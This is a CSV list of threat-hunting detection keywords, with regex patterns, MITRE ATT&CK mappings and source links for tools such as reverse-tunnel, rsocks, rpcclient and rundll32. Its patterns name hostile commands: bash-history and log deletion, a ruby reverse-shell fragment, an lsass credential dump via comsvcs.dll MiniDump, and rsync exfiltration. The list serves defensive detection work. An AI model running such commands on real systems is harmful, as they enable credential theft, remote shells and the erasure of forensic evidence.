"*6f94077fc6f9092d9e9282bee1588e70aaf70ad90407e2bd164c38325249af5e*",".{0,1000}6f94077fc6f9092d9e9282bee1588e70aaf70ad90407e2bd164c38325249af5e.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*774dbc75e046096a7a18dbcef9353543db74312e9656ff4017d7f41c778be2fb*",".{0,1000}774dbc75e046096a7a18dbcef9353543db74312e9656ff4017d7f41c778be2fb.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*793e227ee3a811a143e303909645a874c8db144cf6b48f480411efb2fdd44904*",".{0,1000}793e227ee3a811a143e303909645a874c8db144cf6b48f480411efb2fdd44904.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*8fd62fc653cef0bf765a71cf20a917c8440689e9f5ff77e95a5fea7be6818c66*",".{0,1000}8fd62fc653cef0bf765a71cf20a917c8440689e9f5ff77e95a5fea7be6818c66.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*955854f00a41ee91d047e520aa445035d881f9cb214de1ed49fac829e1caf829*",".{0,1000}955854f00a41ee91d047e520aa445035d881f9cb214de1ed49fac829e1caf829.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*a522a8bfbf83bf52cde85edb32577d6b9acddac6e3a432726f659ae7dd5a6a96*",".{0,1000}a522a8bfbf83bf52cde85edb32577d6b9acddac6e3a432726f659ae7dd5a6a96.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*a79a4c3ae4ecd33b7c078631d3424137ff332d7897ecd6e9ddee28df138a0064*",".{0,1000}a79a4c3ae4ecd33b7c078631d3424137ff332d7897ecd6e9ddee28df138a0064.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*a8ebccf2cc342e1b5154989cd784691b5740a7f3df77cd8adb785f67384a93de*",".{0,1000}a8ebccf2cc342e1b5154989cd784691b5740a7f3df77cd8adb785f67384a93de.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*ba65a4a428b16812cfade65b50138e0b865496a637bdf5dad7993bf3907cdd60*",".{0,1000}ba65a4a428b16812cfade65b50138e0b865496a637bdf5dad7993bf3907cdd60.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*d66a79fcbac667d28014c15003770a35bd941c346e87fb8e4e1b7fd02c3291c9*",".{0,1000}d66a79fcbac667d28014c15003770a35bd941c346e87fb8e4e1b7fd02c3291c9.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*d71bbdd588cd4f1507ea794ed63be80a7cb3bbb1d30430150dd8800adec83fd5*",".{0,1000}d71bbdd588cd4f1507ea794ed63be80a7cb3bbb1d30430150dd8800adec83fd5.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*d7eceeb90b1e75b17c42c6cef5b42e0ef1dc615efba9424bafce718304c7ee43*",".{0,1000}d7eceeb90b1e75b17c42c6cef5b42e0ef1dc615efba9424bafce718304c7ee43.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*dec51bba37da4ecf4df8994cb21931fdfcc4f661c362cb8392f44229d42ef337*",".{0,1000}dec51bba37da4ecf4df8994cb21931fdfcc4f661c362cb8392f44229d42ef337.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*e6c9ef3c9ee804ca3bed5f13f5e179f9ef16b7b2513cdfc33974902faa0f7516*",".{0,1000}e6c9ef3c9ee804ca3bed5f13f5e179f9ef16b7b2513cdfc33974902faa0f7516.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*e717e4a46f338480838e760a05b7a628ccca57b0d4d705a67359bf9481fa58ae*",".{0,1000}e717e4a46f338480838e760a05b7a628ccca57b0d4d705a67359bf9481fa58ae.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*ef77dea20926b6f460844b5a51fd0d238976a1dba89f20f0fccff96712ad9df8*",".{0,1000}ef77dea20926b6f460844b5a51fd0d238976a1dba89f20f0fccff96712ad9df8.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*f865ac0b99a90f54ce67bbabb2e57226a5c61f58e7a867598a3d54fdfee895ee*",".{0,1000}f865ac0b99a90f54ce67bbabb2e57226a5c61f58e7a867598a3d54fdfee895ee.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*f99a0080be86f97331ea300f2a4f448097c5ae39100b15202c89fc91024b215e*",".{0,1000}f99a0080be86f97331ea300f2a4f448097c5ae39100b15202c89fc91024b215e.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*snsinfu/reverse-tunnel*",".{0,1000}snsinfu\/reverse\-tunnel.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*Tunneling remote connection from * to *",".{0,1000}Tunneling\sremote\sconnection\sfrom\s.{0,1000}\sto\s.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z"
"*rm $HISTFILE*",".{0,1000}rm\s\$HISTFILE.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm .bash_history*",".{0,1000}rm\s\.bash_history.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm /var/log/*.log*",".{0,1000}rm\s\/var\/log\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","rm","deleting log files","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm ~/.bash_history*",".{0,1000}rm\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm -rf .bash_history*",".{0,1000}rm\s\-rf\s\.bash_history.{0,1000}","greyware_tool_keyword","rm","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm -rf ~/.bash_history*",".{0,1000}rm\s\-rf\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","rm","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rd /s /q %systemdrive%\$RECYCLE.BIN*",".{0,1000}rd\s\/s\s\/q\s\%systemdrive\%\\\$RECYCLE\.BIN.{0,1000}","greyware_tool_keyword","rmdir ","removes files from the Recycle Bin - erasing forensic evidence","T1070.003","TA0005","N/A","N/A","Defense Evasion","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Ransom/MSIL/Hakbit/Ransom_MSIL_Hakbit_PA_MTB.yar#L7","1","0","N/A","N/A","10","10","196","46","2024-07-09T12:37:18Z","2024-02-05T13:57:05Z"
"*rmmod -r*",".{0,1000}rmmod\s\-r.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","7","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*rmmod --remove*",".{0,1000}rmmod\s\-\-remove.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","7","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*sudo rmmod -r*",".{0,1000}sudo\srmmod\s\-r.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","7","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"rpcclient -*","rpcclient\s\-.{0,1000}","greyware_tool_keyword","rpcclient","tool for executing client side MS-RPC functions","T1021.006 - T1049","TA0002 - TA0009","N/A","N/A","Lateral Movement","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"* rsocks.pool*",".{0,1000}\srsocks\.pool.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"* rsocks.server*",".{0,1000}\srsocks\.server.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*.rsocks.plist*",".{0,1000}\.rsocks\.plist.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/bin/rsocks*",".{0,1000}\/bin\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/com.tonyseek.rsocks.plist*",".{0,1000}\/com\.tonyseek\.rsocks\.plist.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/opt/rsocks/*",".{0,1000}\/opt\/rsocks\/.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/rsocks.git*",".{0,1000}\/rsocks\.git.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*/rsocks.git*",".{0,1000}\/rsocks\.git.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/rsocks.toml*",".{0,1000}\/rsocks\.toml.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*/rsocks/releases/download/*",".{0,1000}\/rsocks\/releases\/download\/.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*/rsocks_linux_amd64*",".{0,1000}\/rsocks_linux_amd64.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*/rsocks_windows_386.exe*",".{0,1000}\/rsocks_windows_386\.exe.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*\rsocks_windows_386.exe*",".{0,1000}\\rsocks_windows_386\.exe.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*14586f0477d31640096bf4749480b78c6a6c3afde3527bcc64e9d5f70d9e93ac*",".{0,1000}14586f0477d31640096bf4749480b78c6a6c3afde3527bcc64e9d5f70d9e93ac.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","#filehash","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*242194dbbdaca6aa7382e0b9f9677a2e7966bc6db8934119aa096e38a9fbf86d*",".{0,1000}242194dbbdaca6aa7382e0b9f9677a2e7966bc6db8934119aa096e38a9fbf86d.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*4a97ad649c31411528694fdd8751bc6521f535f57022e6a6c0a39988df20d7b0*",".{0,1000}4a97ad649c31411528694fdd8751bc6521f535f57022e6a6c0a39988df20d7b0.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*51a5737c2b51190507d47557023264299f8de0b2152e89e093e0e61f64807986*",".{0,1000}51a5737c2b51190507d47557023264299f8de0b2152e89e093e0e61f64807986.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*a539e169941f55d687ca44c90a5a90715dd23871a04a64f1712e08e758df0ec0*",".{0,1000}a539e169941f55d687ca44c90a5a90715dd23871a04a64f1712e08e758df0ec0.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*a9a87bdcf06a8b5ee41a1eec95c0f9c813a5f29ba6d8eec28b07d8331aa5eb85*",".{0,1000}a9a87bdcf06a8b5ee41a1eec95c0f9c813a5f29ba6d8eec28b07d8331aa5eb85.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","#filehash","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*brimstone/rsocks*",".{0,1000}brimstone\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z"
"*easy_install rsocks*",".{0,1000}easy_install\srsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*import socket, socks, listen, serve, wrap_ssl, GreenPool*",".{0,1000}import\ssocket,\ssocks,\slisten,\sserve,\swrap_ssl,\sGreenPool.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*pip install rsocks*",".{0,1000}pip\sinstall\srsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*pip install -U rsocks*",".{0,1000}pip\sinstall\s\-U\srsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*rsocks --config*",".{0,1000}rsocks\s\-\-config.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*rsocks/server.py*",".{0,1000}rsocks\/server\.py.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","1","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*rsocks\server.py*",".{0,1000}rsocks\\server\.py.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*tonyseek/rsocks*",".{0,1000}tonyseek\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","1","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z"
"*rsync -r * *@*:*",".{0,1000}rsync\s\-r\s.{0,1000}\s.{0,1000}\@.{0,1000}\:.{0,1000}","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rsync -r *@*:* *",".{0,1000}rsync\s\-r\s.{0,1000}\@.{0,1000}\:.{0,1000}\s.{0,1000}","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *",".{0,1000}ruby\s\-rsocket\s.{0,1000}TCPSocket\.open\(.{0,1000}exec\ssprintf.{0,1000}\/bin\/sh\s\-i\s.{0,1000}","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*lsass*rundll32.exe *comsvcs.dll, MiniDump *.dmp full*",".{0,1000}lsass.{0,1000}rundll32\.exe\s.{0,1000}comsvcs\.dll,\sMiniDump\s.{0,1000}\.dmp\sfull.{0,1000}","greyware_tool_keyword","rundll32","dumping lsass","T1003 - T1055.011 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","N/A","1","0","N/A","observed in exploitations by mthcht","10","10","N/A","N/A","N/A","N/A"
"*rundll32*.dll*a*/p:*",".{0,1000}rundll32.{0,1000}\.dll.{0,1000}a.{0,1000}\/p\:.{0,1000}","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
